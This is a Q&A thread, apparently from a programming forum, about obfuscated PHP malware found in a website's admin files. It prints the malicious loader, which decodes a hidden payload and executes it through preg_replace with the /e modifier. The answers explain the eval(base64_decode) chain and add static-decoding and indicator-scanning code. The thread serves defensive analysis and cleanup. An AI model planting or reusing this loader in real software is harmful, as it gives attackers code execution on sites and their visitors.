Malicious PHP Files Detected by Host

I do not know if it is right to ask this question; if it is not, please let me know.

I recently got a project to move a website from one host (I don't know which one) to a new one (host agent). I did this, and within one day I received a message from the host agent that the site had been blocked because malicious files were detected on the server. They gave me a list of PHP files that contained "malware". I opened them, and, of course, there was something unusual. There was a huge hexadecimal string (hereinafter referred to as THE STRING) assigned to a global variable and some more hidden gibberish below it.

I tried to understand the code, and what I understood is written in the comments:

 <?php
 $I1ll=0;
 $GLOBALS['I1ll'] = ';!AY3VybAqbX2luaXQYWxsb3dfdXJsX2ZvcGVuJFlMQipVX3NldG9wdAU&=X2V4ZWMpxtXwGEXY2xvc2UxDFy&PGltZyBzcmM9Ig^ZIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4CHgoegSFRUUF9IT1NU%_MTI3LgNjbMTAuAgNMTkyLjE2OC4.gdwb}ub3Nvbi5pbgZ2Fib3Iuc2U.c2lsYmVyLmRlZDaGF2ZWFwb2tlLmNvbS5hdQ^PWV8&OgZGlzcGxheV9lcnJvcnMOkZGV0ZXJtaW5hdG9yZnRwDm Mi4xMgMroSUkxSTFsbGwxwU qYmFzZTY0X2RlY29kZQivkYmFzZTY0X2VuY29kZQeaHR0cDovLwFq}SFRUUF9VU0VSX0FHRU5UW*dW5pb 24_D.c2VsZWN0cyrUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUUVVFUllfU1RSSU5H@ _Pw(FL3RtcC8R.kjL3RtcAQVE1QhuVEVNUAkVE1QRElSaKuAdXBsb2FkX3RtcF9kaXIdLg~gdmVyc2lv$LQjLXBocA=kSFRUUF9FWEVDUEhQN;Ijjb3V0b2sH$!iRaHR0cAIOi8vii}L3BnLnBocD91PQ~XJms9mBJnQ9cGhwJnA9?nMJnY9Cd*?6261736536345f6465636f6465';
 if (!function_exists('I111II11')) {          // if the function doesn't exist
     function I111II11($a, $b) {              // define the function
         $c = $GLOBALS['I1ll'];               // THE STRING
         $d = pack('H*', substr($c, -26));    // pack the last 26 characters of THE STRING (hex) into a binary string; translates to 'base64_decode'
         return $d(substr($c, $a, $b));       // base64_decode the requested section of THE STRING
     }
 };
 $Illl1I1l1 = I111II11(6482, 16);             // decodes 'cHJlZ19yZXBsYWNl', which translates to 'preg_replace'
 $Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI"); // replace 'IIIIll1lI' with ''
 ?>

So in the end, it uses the preg_replace function to replace the string, but as far as what this code seeks to achieve, it does nothing with the result, not even echo it. Does it just use up processor time? Does the /e modifier have anything to do with this?

Another thing I would like to mention is that there is more code in the files, regular code. These are not junk files; they are the website's administrative files used to manage the site, such as adding or removing content, etc.

In addition, the files are not all exactly the same; they have different strings and extract different parts of them in terms of character positions.

Any idea what it is?

Edit: I found a similar question where the cleaned version is posted and explained in detail.

+5
3 answers
 $Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI") 

translates to

 preg_replace("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI") 

where the important part is /e, which evaluates the output of I111II11(658, 5824) as PHP code before replacing.

What I111II11(658, 5824) returns:

 eval(base64_decode("aWYgKCFkZWZpbmVkK...bEkpOyB9IH0gfQ==")); 

If you change eval to echo, you will see the PHP code that gets executed. I will not paste it here in full, but you can try to understand it if you want.

 if (!defined("determinator")) { function getfile($QOQOOO) { $I1llI1 = I111II11(3, 6); $I1I111 = $I1llI1.I111II11(11, 7); ... 

The code has lines starting with CURLOPT_ in it, so it seems to have downloaded something.

+3
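The decoding the answer above describes, reproduced as an added example (not code from the question or the answer) in Python, so the payload can be unwrapped without executing any PHP. The roughly 5.8 KB second stage is not on the page, so a constructed stand-in is used, and the offsets 6482/658 are replaced by ones computed for that constructed string; the only part taken verbatim from the question is the 26-character hex tail of THE STRING.

```python
"""Static emulation of the loader from the question: decode THE STRING the way
I111II11() does, then peel the eval(base64_decode(...)) wrapper, without ever
executing PHP. Added example; the ~5.8 KB payload is not on the page, so a
small constructed one stands in for it."""
import base64
import binascii
import re

# Last 26 characters of THE STRING exactly as shown in the question.
REAL_HEX_TAIL = "6261736536345f6465636f6465"

# Constructed innermost stage (the real one starts the same way: a defined()
# guard on the constant "determinator", then the getfile()/CURLOPT_ code).
STAGE3 = 'if (!defined("determinator")) { define("determinator", 1); }'


def b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


def build_sample_loader():
    """Lay out a stand-in for THE STRING the way the malware does:
    [decoy][b64(stage 2)][decoy][b64("preg_replace")][hex("base64_decode")]
    and return it with the (offset, length) pairs a loader would hard-code."""
    stage2 = 'eval(base64_decode("' + b64(STAGE3) + '"));'
    seg_stage2 = b64(stage2)
    seg_func = b64("preg_replace")           # == 'cHJlZ19yZXBsYWNl', as in the question
    decoy = ";!AY3VybAqbX2luaXQ"             # filler resembling the real string
    the_string = decoy + seg_stage2 + decoy + seg_func + REAL_HEX_TAIL
    offsets = {
        "stage2": (len(decoy), len(seg_stage2)),
        "func": (2 * len(decoy) + len(seg_stage2), len(seg_func)),
    }
    return the_string, offsets


def decoder_name(the_string: str) -> str:
    """pack('H*', substr($c, -26)): the hex tail names the function the loader calls."""
    return binascii.unhexlify(the_string[-26:]).decode()


def I111II11(the_string: str, a: int, b: int) -> str:
    """Python twin of the PHP helper: base64_decode(substr($c, $a, $b))."""
    name = decoder_name(the_string)
    if name != "base64_decode":
        raise ValueError("loader resolves to unexpected function: " + name)
    return base64.b64decode(the_string[a:a + b]).decode()


EVAL_B64 = re.compile(r'^eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);?$')


def unwrap(code: str, max_depth: int = 10):
    """Peel eval(base64_decode("...")) layers textually and return every stage.
    Same effect as the answer's 'change eval to echo' trick, minus the eval."""
    stages = [code]
    for _ in range(max_depth):
        m = EVAL_B64.match(stages[-1].strip())
        if not m:
            break
        stages.append(base64.b64decode(m.group(1)).decode())
    return stages


def analyse(the_string, offsets):
    """Resolve the hidden function name and unwrap the replacement argument.
    preg_replace("/X/e", replacement, "X") would eval() that argument; here it
    is only decoded, so nothing attacker-controlled runs."""
    func = I111II11(the_string, *offsets["func"])
    replacement = I111II11(the_string, *offsets["stage2"])
    return func, unwrap(replacement)


if __name__ == "__main__":
    s, off = build_sample_loader()
    func, stages = analyse(s, off)
    print("hidden call:", func)
    for i, stage in enumerate(stages, 1):
        print(f"--- stage {i} ---\n{stage}")
```

Against a real sample you would paste the whole of THE STRING into `the_string` and use the offsets from the file; note that PHP's base64_decode silently skips characters outside the base64 alphabet, and Python's b64decode does the same in its default non-strict mode, but rejects bad padding, so a slice that lands off by one may need trimming. The unwrapping stops at the first stage that is not a bare eval(base64_decode(...)); anything after that (the getfile()/CURLOPT_ code in this case) is read, not run.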

Once you have established that it is a hack (which is obvious in this case), there is not much mileage in trying to understand what the code does and how it does it. Your first responsibilities should be:

  • To restore the site to a clean, unhacked state.
  • To find out how the hack occurred.
  • To take measures to prevent a recurrence.

First of all, I really hope that you have an original copy of the code from before the hack. If this is custom-written code, then I hope you have the source code somewhere. If it is a third-party application, you can download it from the original supplier. Do not try to recover it from the hacked files; you can see the obvious hacks, but there may be other, less obvious things; you simply won't know unless you perform a full code audit.

Switching to a new host may help with #3, depending on the answer to #2. You are doing that anyway, so that is a good start.

On the other hand, if your original PHP application has vulnerabilities that were exploited, then no amount of switching hosts will help; you really need to fix the code. For third-party applications, if the application is well supported, this can be achieved by updating to the latest version. For custom code, you need to find the security flaws yourself.

After you have completed all the work to secure the site, then you can take the time to analyze the actual hacked code.

+3

Hi @VeeK. I looked at the code, and there is one suspicious thing in it: the use of preg_replace with the e modifier, which is dangerous and is therefore deprecated in the latest versions of PHP, since it can lead to the execution of remote malicious code. And, as a user of that host, I can say that the host's server scans all uploaded files, which obviously caught the logic of the code execution.

For your reference, these are the best resources from a security researcher:

Read here

+2
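The answer above says the host's file scan caught this. As an added example, and not the host's tool or anything from the question, here is a small indicator scan in Python for the features that give this loader away on disk: pack('H*', ...) resolving a function name, a call through a variable whose first argument is a regex with the e modifier, and a very long high-entropy string literal. Both sample files are constructed; the identifiers and the hex tail in the malicious one are taken from the question, and the blob standing in for THE STRING is generated.

```python
"""Heuristic indicator scan for the obfuscation pattern in the question
(added example, not the host's scanner). Works on file text only; it never
runs the PHP. Sample files below are constructed."""
import base64
import math
import re
from collections import Counter, namedtuple

Finding = namedtuple("Finding", "indicator line snippet")

# A quoted regex literal whose modifier list contains 'e' (before PHP 7,
# preg_replace then eval()s the replacement). The second indicator catches the
# call through a variable, which is how the sample hides 'preg_replace'.
_REGEX_WITH_E = r'(["\'])(.)(.*?)\2[a-zA-Z]*e[a-zA-Z]*\1'
INDICATORS = {
    "eval_base64": re.compile(r'\beval\s*\(\s*base64_decode\s*\('),
    "pack_hex": re.compile(r'\bpack\s*\(\s*["\']H\*["\']'),
    "preg_replace_e": re.compile(r'\bpreg_replace\s*\(\s*' + _REGEX_WITH_E),
    "dynamic_call_regex_e": re.compile(r'\$\w+\s*\(\s*' + _REGEX_WITH_E),
}
# Single-line string literals of 200+ characters (THE STRING is thousands).
LITERAL = re.compile(r"'([^'\n]{200,})'|\"([^\"\n]{200,})\"")


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_php(src: str, min_entropy: float = 4.0):
    """Return one Finding per indicator hit, with its 1-based line number."""
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, rx in INDICATORS.items():
            m = rx.search(line)
            if m:
                findings.append(Finding(name, no, m.group(0)[:60]))
        for m in LITERAL.finditer(line):
            lit = m.group(1) or m.group(2)
            ent = shannon_entropy(lit)
            if ent >= min_entropy:      # base64/hex blobs sit near 5-6 bits/char
                findings.append(Finding("high_entropy_literal", no,
                                        f"{len(lit)} chars, {ent:.2f} bits/char"))
    return findings


# Constructed stand-in for THE STRING: base64-looking filler ending in the hex
# for 'base64_decode' (6261...6465) that the question shows.
_BLOB = base64.b64encode(bytes(range(256)) * 2).decode() + "6261736536345f6465636f6465"

MALICIOUS_SAMPLE = (
    "<?php $I1ll=0;$GLOBALS['I1ll'] = '" + _BLOB + "'; "
    "if (!function_exists('I111II11')){ function I111II11($a, $b){ $c=$GLOBALS['I1ll']; "
    "$d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b)); } };\n"
    "$Illl1I1l1 = I111II11(6482, 16);\n"
    '$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI");\n'
)

# Constructed clean admin script: uses preg_replace legitimately (no /e).
CLEAN_SAMPLE = r"""<?php
require_once __DIR__ . '/../config.php';
$title = preg_replace('/\s+/', ' ', trim($_POST['title'] ?? ''));
$stmt = $pdo->prepare('UPDATE pages SET title = :t WHERE id = :id');
$stmt->execute([':t' => $title, ':id' => (int) $_POST['id']]);
"""

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, scan_php(src) or "no findings")
```

Note that the `eval_base64` indicator does not fire on the file itself: the eval(base64_decode(...)) only appears after the loader decodes its string, which is why the loader's own features (the hex-packed function name, the dynamic call with a /e regex, the blob) are what a file scan has to key on. The regexes are line-based heuristics; a legitimate regex literal followed by an argument containing the delimiter on the same line can produce a false positive, so treat hits as triage leads, not verdicts.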
